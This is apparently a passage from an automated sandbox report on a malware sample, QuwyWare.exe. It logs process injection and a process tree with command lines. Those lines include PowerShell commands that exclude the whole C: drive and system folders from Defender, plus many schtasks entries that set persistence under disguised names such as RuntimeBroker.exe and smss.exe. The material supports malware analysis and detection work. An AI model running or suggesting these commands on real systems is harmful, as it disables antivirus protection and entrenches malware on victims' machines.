Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 512 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 512 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 512 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 512 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 512 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 512 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 3884 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 3884 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 3884 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1988 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2904 wrote to memory of 1704 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2904 wrote to memory of 1704 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2904 wrote to memory of 1704 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 1704 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 4016 wrote to memory of 3860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4252 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4252 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 1976 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 1976 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2336 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2336 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3412 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3412 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2800 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2800 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3696 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3696 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4348 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4348 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3608 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 3608 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4552 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4552 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 4816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2276 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4016 wrote to memory of 2276 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2276 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2276 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4016 wrote to memory of 4356 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\cmd.exe
PID 4016 wrote to memory of 4356 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\cmd.exe
PID 4356 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4356 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4356 wrote to memory of 4796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4356 wrote to memory of 4796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4356 wrote to memory of 2140 N/A C:\Windows\System32\cmd.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe
PID 4356 wrote to memory of 2140 N/A C:\Windows\System32\cmd.exe C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe
PID 2140 wrote to memory of 712 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 712 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 320 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 320 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3036 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3036 N/A C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe

"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"

C:\Users\Admin\AppData\Local\Temp\hwid.exe

"C:\Users\Admin\AppData\Local\Temp\hwid.exe"

C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe

"C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\comServerRefcrtNet\mqTOHq8aHZClYn48E.vbe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\comServerRefcrtNet\lnxvZRavX52Sj8TeqZsoOZAX1b085ZLmiJmz2YXZ5HGWoFSPgyZVlmrEm.bat" "

C:\comServerRefcrtNet\ComsurrogateHost.exe

"C:\comServerRefcrtNet/ComsurrogateHost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nr14kmka\nr14kmka.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9470.tmp" "c:\Windows\System32\CSC284368D78044F41BA30132654ADC74A.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\comServerRefcrtNet\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\comServerRefcrtNet\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\comServerRefcrtNet\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\MSBuild\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Program Files\MSBuild\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yRstqPcxW7.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe

"C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8JExSyzmRo.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe

"C:\Windows\SoftwareDistribution\Download\RuntimeBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\comServerRefcrtNet\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\comServerRefcrtNet\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\comServerRefcrtNet\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\siuck4sj\siuck4sj.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE05.tmp" "c:\Recovery\WindowsRE\CSCA07083C9CF314723A6CD4948A81461.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfvq1vqc\xfvq1vqc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBA.tmp" "c:\Recovery\WindowsRE\CSC671A800D3B124051996CE8178E9AE197.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u1elvbdo\u1elvbdo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11AE.tmp" "c:\comServerRefcrtNet\CSC40A8B3E794A14CB6B81AC9695A086B0.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ywdpcwvf\ywdpcwvf.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES126A.tmp" "c:\Program Files\MSBuild\CSCA9C160C1AA0842E0AAA271B7FBC3FCF.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uwf5e2pn\uwf5e2pn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1354.tmp" "c:\Windows\SoftwareDistribution\Download\CSC843AFAE444044DF9A627B2B89B543F.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\ja-JP\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\comServerRefcrtNet\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\comServerRefcrtNet\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\comServerRefcrtNet\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\CrashReports\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe'" /rl HIGHEST /f

